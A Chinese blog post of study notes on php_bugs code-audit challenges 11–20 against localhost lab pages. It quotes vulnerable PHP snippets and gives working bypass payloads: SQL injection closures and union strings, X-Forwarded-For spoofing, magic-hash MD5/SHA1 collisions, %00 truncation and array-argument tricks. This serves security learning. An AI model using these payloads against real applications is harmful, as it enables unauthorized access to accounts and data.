php代码审计分段学习(php_bug)[2]

简介: 参考:https://github.com/bowu678/php_bugs11.sql闭合绕过$sql = "select user from php where (user='$user') and (pw='$pass')";嗯好吧这个不就是...

参考:https://github.com/bowu678/php_bugs

11.sql闭合绕过

$sql = "select user from php where (user='$user') and (pw='$pass')";嗯好吧这个不就是sqli-labs的Less-3么,放下writeup好了http://localhost/php_bug/11.php/?user=admin')#

12.X-Forwarded-For绕过指定IP地址
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";},直接bp抓包,在http头里面加上X-Forwarded-For:1.1.1.1就行了,X-Forwarded-For代表客户端,里面存放的是HTTP端请求的真实ip。

13.md5加密相等绕过
$a != 'QNKCDZO' && $md51 == $md52,两个字符串不相等但是md5后的值相等,记下writeup。
var_dump(md5('240610708') == md5('QNKCDZO'));//ture
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));//ture
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));//ture
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));//ture
var_dump('0010e2' == '1e3');//ture
var_dump('0x1234Ab' == '1193131');//ture
var_dump('0xABCdef' == ' 0xABCdef');//ture
==对比的时候会进行数据转换,0eXXXXXXXXX就成0了,如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换为数值并且比较按照数值来进行,嗯还是用===好一些,尽量不要用==。

14.intval函数四舍五入
emmmm,这个函数。。。先是查询的时候intval($_GET['id'])为1024,但是$_GET['id']又不能为1024,直接1024.325加个小数点就行了。。intval会自动将小数点后面的数值舍掉

15 strpos数组绕过NULL与ereg正则%00截断
@ereg ("^[1-9]+$", $_GET['nctf']
strpos ($_GET['nctf'], '#biubiubiu')
①.这个是要求输入的内容必须为纯数字,但是还有出现#biubiubiu的内容,eregde%00截断可以实现,但是题目上给的#需要url编码一下,要不实现不了。http://localhost/php_bug/15.php?nctf=12414%00%23biubiubiu
②.strpos()找的是字符串,那么传一个数组给它,strpos()出错返回null,null!==false,符合要求. 所以输入nctf[]= ,ereg()在出错时返回的也是null,null!==falsehttp://localhost/php_bug/15.php?nctf[]=

16.SQL注入or绕过
$query='SELECT * FROM interest WHERE uname=''.$username.'' AND pwd=''.$password.'';';
$query='SELECT * FROM users WHERE name=''admin'' AND pass=''or 1 #'';';
?username=admin'' AND pass=''or 1 #&password=
有点传说中的花式闭合的感觉。。

17.密码md5比较绕过
总感觉眼熟,emmm和第九个是一样的。。。
?user=' union select '202cb962ac59075b964b07152d234b70' #&pass=123

18.md5()函数===使用数组绕过
$_GET['username'] == $_GET['password']
md5($_GET['username']) === md5($_GET['password'])
http://localhost/php_bug/18.php?username[]=1&password[]=2,前面已经在sha1()函数比较绕过这个里面详细说过了,,基本同样道理,这里就不多做描述了。

19 ereg()函数strpos() 函数用数组返回NULL绕过
ereg ("^[a-zA-Z0-9]+$", $_GET['password'])
strpos ($_GET['password'], '--')
emm这个和15是一样的只是ereg()的这个函数现在要求的是只能出现字母和数字,依旧是两种方法
http://localhost/php_bug/19.php?password[]=
http://localhost/php_bug/19.php?password=12a%00--

  1. 十六进制与数字比较
    ($digit >= $one) && ($digit <= $nine)
    $number == $temp
    这个题的要求是输入的数字不能是1~9的数字,但是又要与3735929054相等,转化为16进制
    http://localhost/php_bug/20.php?password=0xdeadc0de
    54975581388转换成16进制为ccccccccc
目录
相关文章
|
5天前
|
设计模式 数据库连接 PHP
PHP中的设计模式:如何提高代码的可维护性与扩展性在软件开发领域,PHP 是一种广泛使用的服务器端脚本语言。随着项目规模的扩大和复杂性的增加,保持代码的可维护性和可扩展性变得越来越重要。本文将探讨 PHP 中的设计模式,并通过实例展示如何应用这些模式来提高代码质量。
设计模式是经过验证的解决软件设计问题的方法。它们不是具体的代码,而是一种编码和设计经验的总结。在PHP开发中,合理地使用设计模式可以显著提高代码的可维护性、复用性和扩展性。本文将介绍几种常见的设计模式,包括单例模式、工厂模式和观察者模式,并通过具体的例子展示如何在PHP项目中应用这些模式。
|
6天前
|
设计模式 算法 数据库连接
PHP中的设计模式:如何优化你的代码结构
在本文中,我们将深入探讨PHP中的设计模式。设计模式是解决常见软件设计问题的最佳实践。它们不是具体的代码,而是一种编程经验的总结。掌握设计模式可以帮助你写出更高效、灵活和可维护的代码。本文将介绍几种常见的设计模式,并通过示例展示如何在PHP项目中应用这些模式。无论你是PHP初学者还是有经验的开发者,都能从本文中获得启发和实用的技巧。
|
2天前
|
设计模式 算法 数据库连接
PHP中的设计模式:提高代码的可维护性与扩展性本文旨在探讨PHP中常见的设计模式及其应用,帮助开发者编写出更加灵活、可维护和易于扩展的代码。通过深入浅出的解释和实例演示,我们将了解如何使用设计模式解决实际开发中的问题,并提升代码质量。
在软件开发过程中,设计模式是一套经过验证的解决方案模板,用于处理常见的软件设计问题。PHP作为流行的服务器端脚本语言,也有其特定的设计模式应用。本文将重点介绍几种PHP中常用的设计模式,包括单例模式、工厂模式和策略模式,并通过实际代码示例展示它们的具体用法。同时,我们还将讨论如何在实际项目中合理选择和应用这些设计模式,以提升代码的可维护性和扩展性。
|
1天前
|
设计模式 算法 PHP
PHP中的设计模式:提升代码的可维护性与扩展性
在软件开发中,设计模式是一套经过验证的解决特定问题的模板。对于使用PHP语言的开发者来说,合理运用设计模式不仅可以优化代码结构,还能显著提高项目的可维护性和扩展性。本文将探讨几种常见的设计模式及其在PHP中的应用,帮助开发者编写更高效、更灵活的代码。
|
1天前
|
设计模式 算法 搜索推荐
PHP中的设计模式:提高代码可维护性的秘诀
在本文中,我们将探讨PHP设计模式的重要性以及它们如何帮助开发者编写出更加灵活、可维护的代码。我们将介绍几种常见的设计模式,包括单例模式、工厂模式和策略模式,并通过实际示例展示它们在PHP中的应用。最后,我们会讨论何时使用这些设计模式以及在实际项目开发中的最佳实践。
5 1
|
2天前
|
设计模式 测试技术 PHP
深入探索PHP的面向对象编程:提升代码重用性与可维护性
PHP的面向对象编程(OOP)是一种强大的编程范式,它不仅能够显著提高代码的重用性和可维护性,还能使复杂项目的开发和管理变得更加高效和模块化。本文将深入浅出地探讨PHP中面向对象编程的核心概念、实用技巧以及在实际项目开发中的应用案例,帮助读者更好地理解和掌握这一关键技术,从而编写出更加健壮、灵活和易于维护的PHP应用程序。
|
4天前
|
PHP 数据安全/隐私保护 开发者
探索PHP中的面向对象编程:提升代码的可维护性与扩展性
在本文中,我们将深入探讨PHP中的面向对象编程(OOP),一种强大的编程范式,它不仅能够提高代码的重用性和可维护性,还能增强代码的灵活性和可扩展性。通过具体的示例和实践技巧,本文将指导读者如何有效地利用OOP原则来构建结构化的PHP应用程序,从而在日常开发中实现更高效、更可靠的编码体验。
|
11天前
|
设计模式 数据库连接 PHP
PHP中的设计模式:提高代码的可维护性与扩展性
在本文中,我们将深入探讨PHP编程语言中设计模式的重要性,以及如何通过应用这些模式来提高代码的可维护性和扩展性。设计模式是一套被反复使用、经过分类编目的代码设计经验的总结。它们代表了最佳的实践,能帮助开发者编写出更加健壮、灵活和可复用的代码。本文将介绍几种常见的设计模式,并通过PHP代码示例展示其应用。
|
13天前
|
缓存 NoSQL PHP
使用PHP-redis实现键空间通知监听key失效事件的技术与代码示例
通过上述方法,你可以有效地在PHP中使用Redis来监听键空间通知,特别是针对键失效事件。这可以帮助你更好地管理缓存策略,及时响应键的变化。
43 3
|
14天前
|
PHP 开发者
PHP中的异常处理:提升代码的健壮性与可维护性
【9月更文挑战第12天】在编程的世界里,错误和异常是不可避免的。它们像是旅途中的绊脚石,让我们的步伐变得蹒跚。然而,正是这些挑战,塑造了我们解决问题的能力。本文将引导你了解如何用PHP的异常处理机制来捕捉这些“绊脚石”,并将其转化为成长的阶梯。我们将一起探索如何通过异常处理来增强代码的健壮性和可维护性,让你的程序在面对未知和意外时,依然能够优雅地舞蹈。